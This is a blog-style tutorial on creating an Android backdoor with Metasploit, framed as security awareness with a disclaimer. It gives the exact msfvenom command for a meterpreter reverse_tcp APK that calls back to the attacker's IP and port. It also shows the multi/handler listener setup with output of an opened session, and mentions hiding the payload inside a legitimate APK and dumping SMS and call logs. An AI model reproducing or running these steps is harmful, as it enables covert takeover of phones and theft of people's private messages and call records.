Simple Android backdoor through Reverse TCP using MSF
Android is a very user friendly, highly scalable OS that hand-held devices ever had.It is a open sourced OS and also gives the users of Android, power to tweak a lot in their device. Such a power might lead to security risks and vulnerabilities. One such power Android provides is the power to install any application which are not even from play store and trusted developers.
The motive of this article is to show/bring awareness why untrusted applications should never be installed on Android device(or on any device) and how easy it is to take data from a remote device. Although its explained in detail below, the actual process to create a backdoor and take control would be very few minutes.
In this article we will see how Reverse TCP works for backdoor using a very famous framework in security community called "Metasploit".
Disclaimer:
This article is purely for educational purpose only and not to be used for any malicious practices.I don't take any liability for any damages caused due to unethical practices.
TCP/IP :
IP or internet protocol is a set of rules used in Internet environment in providing logical addressing of a host. In other words, IP rules are used to define or trace a internet connected device.
Whereas TCP or Transfer control Protocol is a part of IP suite, which is responsible for data packet delivery and control. So, its a de-facto to say "TCP/IP" when talking about TCP.
Reverse TCP??
When an attacker wants to access a device, he needs to initiate a connection to the device. The possibility of connecting from attacker machine to target is very less, because either the listening ports won't be open in device. If it is in case of computer, firewall blocks it.
So, with a little social engineering if the attacker could put his payload into the target device, instead of the above said procedure, the target device will initiate a connection to the attacker's device. This process is called as reverse TCP connection.
Pre-Requisites:
- Linux machine(Not necessarily but preferably Linux)-Attacker
- Metasploit framework
- PostgreSQL(DB for metasploit)
- Android device to test -Victim
What is Metasploit??
Metasploit is a very famous security framework which contains huge volume of exploit database and other scripts, used for penetration testing and finding vulnerabilities/informations. It is a product from the company Rapid7 and the framework can be downloaded from https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
Metasploit has 7 modules as below and basis on the requirement, respective modules can be used. In this article lets see only about exploits and payload modules.
Exploits and Payloads:
Exploits are the already found vulnerabilities across different environments like Linux,Unix, Android etc., which uses payloads to replicate the vulnerabilities. Below image shows the environments for which the exploits are available from metasploit.
Payloads are the codes that run remotely on target. Currently there are 2000+ exploits and 500+ payloads available in metasploit. Payload used in our testing is Meterpreter Reverse TCP and Multi/Handler is the interface used to handle the codes that run outside the metasploit framework.
Exploit steps:
We will see the exploit tested on a local network in this article. In order to use it over Internet, port forwarding is required. In case of persistent backdoor, static IP is required for the attacker machine along port forwarding and process trigger required at payload code. Please note, it is unethical to test on other's devices which breaches their privacy and individuals should refrain from such activities.
1.Find local IP address using commands like "ip a" or "ipconfig" or ifconfig" based on the environment/libraries available.In my case, local IP is 192.168.29.149.
2. Create payload using msfvenom(Command line utility of metasploit for creating payloads)
Syntax : msfvenom -p payload_type lhost=0.0.0.0 lport=port_number R > destination path and payload name
-p : payload flag
lhost : Local attacker's host IP taken from step-1
lport: Local attacker's listening port
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.29.149 lport=1443 R > /home/grim/Desktop/payload.apk
3. Output APK is UI-less and has no functions for any user activities. This payload can also be obfuscated with a legit APK too. Once the payload apk file is created, install it in your testing device.
4. Enable the payload listener in local attacker machine using below commands. Please refer the comments given against each command in snippet for better understanding.
GRIM@kali:~/Desktop$ msfconsole <<triggers metasploit console>> msf5 > use exploit/multi/handler <<set the type of exploit>> msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp <<set the type of payload>> msf5 exploit(multi/handler) > set LHOST 192.168.29.149 <<set local host IP>> LHOST => 192.168.29.149 msf5 exploit(multi/handler) > set LPORT 1443 <<set local port used in payload>> LPORT => 1443 msf5 exploit(multi/handler) > exploit <<Starts the exploit listener>> [*] Started reverse TCP handler on 192.168.29.149:1443 <<Exploit listener started>> [*] Sending stage (73735 bytes) to 192.168.29.158 [*] Meterpreter session 1 opened (192.168.29.149:1443 -> 192.168.29.158:47056) at 2020-06-14 10:08:02 -0400 <<Once the victim's device installs the app and accepts permissions, meterpreter session is opened>> meterpreter >
5. Once the meterpreter session is open, it means the backdoor is successful and reverse TCP connection is established. Now type "Help" to get list of commands available to be executed on target device.
meterpreter > help
6. Now lets test some commands like check root, take sms and call dumps.
Conclusion:
So its very easier to take control of an Android device than you think. All it would take is under five minutes to prepare a backdoor and take control of device using such scripts. So never install unknown apps or permit device access to any. This suits for the computers too. As the saying goes "Prevention is always better than cure".